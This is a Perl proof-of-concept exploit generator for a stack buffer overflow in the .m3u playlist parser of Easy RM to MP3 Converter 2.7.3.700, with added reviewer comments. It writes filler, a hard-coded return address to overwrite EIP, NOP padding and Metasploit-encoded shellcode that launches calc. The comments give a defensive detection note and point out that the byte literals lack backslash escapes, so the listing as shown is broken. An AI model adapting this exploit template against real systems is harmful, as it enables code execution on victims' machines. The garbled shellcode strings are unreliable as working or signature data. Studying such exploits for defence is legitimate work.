# Title : Easy RM to MP3 Converter 2.7.3.700
# Published : 2009-12-10
# Author : Vinod Sharma
#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP Sp2 Buffer Overflow Exploit
# Author: Vinod Sharma
# Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db
# Originally published at : http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/
#Vulnerability discovered by CYBER-ZONE
#Advisory:http://secunia.com/advisories/34653
# Proof-of-concept generator for the Easy RM to MP3 Converter .m3u overflow
# named in the header (Secunia advisory 34653). It writes a single file,
# exploit.m3u, built from three concatenated parts: filler, a packed 4-byte
# value, and a payload. The vulnerable parser is in the converter itself and
# is not shown in this script.
#
# NOTE(review): as rendered on this page the string literals carry no
# backslash escapes, so "x41" is the three characters 'x', '4', '1' rather
# than one byte. The listing therefore does not emit the bytes its comments
# describe; do not derive detection signatures from what it writes.
#
# Defender view: the intended artifact is a playlist holding one very long
# line (tens of thousands of bytes, no newline) of non-path content. Playlist
# files are normally short lines of paths or URLs, so an .m3u with a line of
# that length is a reasonable thing to flag or quarantine. The header lists
# only Windows XP SP2 (En) as tested; no fixed version is named on this page.

# Output filename, created relative to the current working directory.
my $file= "exploit.m3u";
# Filler: the literal repeated 26059 times by the `x` repetition operator.
my $junk= "x41" x 26059;
# pack('V', ...) encodes the number as a 32-bit little-endian value. The
# variable name says it is meant to replace the saved instruction pointer.
# NOTE(review): a hard-coded absolute address only makes sense where the
# process memory layout matches the tested system -- presumably why a single
# OS build is listed; address randomisation (ASLR) breaks that assumption.
my $eip= pack('V', 0x01a8f23a);
# Padding placed in front of the payload (25 repetitions of the literal).
my $shellcode= "x90" x 25;
# Author's description of the payload that follows: a Metasploit-generated
# windows/exec payload that launches calc, i.e. a harmless demonstration
# command. The block below is kept exactly as published.
#/*
#* windows/exec - 223 bytes
#* http://www.metasploit.com
#* Encoder: x86/shikata_ga_nai
#* EXITFUNC=thread, CMD=calc
#*/
# Append the payload to the leading padding, one string literal per line.
$shellcode = $shellcode.
"x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4".
"x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff".
"xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8".
"xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69".
"x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3".
"xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76".
"xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07".
"x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57".
"x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d".
"x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62".
"x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c".
"xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27".
"xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0".
"x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed".
"x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66".
"xf3x07";
# Trailing padding. `x` binds tighter than `.`, so this appends 25
# repetitions of the literal instead of repeating the whole buffer.
$shellcode = $shellcode."x90" x 25;
# Script hygiene: two-argument open with the mode spliced into the filename,
# an undeclared $FILE (no `my`; there is no `use strict` to reject it), and no
# check of open's return value.
open($FILE, ">$file");
# Single write with no line terminator: filler, then the packed value, then
# the padded payload.
print($FILE $junk.$eip.$shellcode);
close($FILE);
# Printed unconditionally, so "successfully" is reported even when the open
# or the write above failed.
print("exploit created successfully");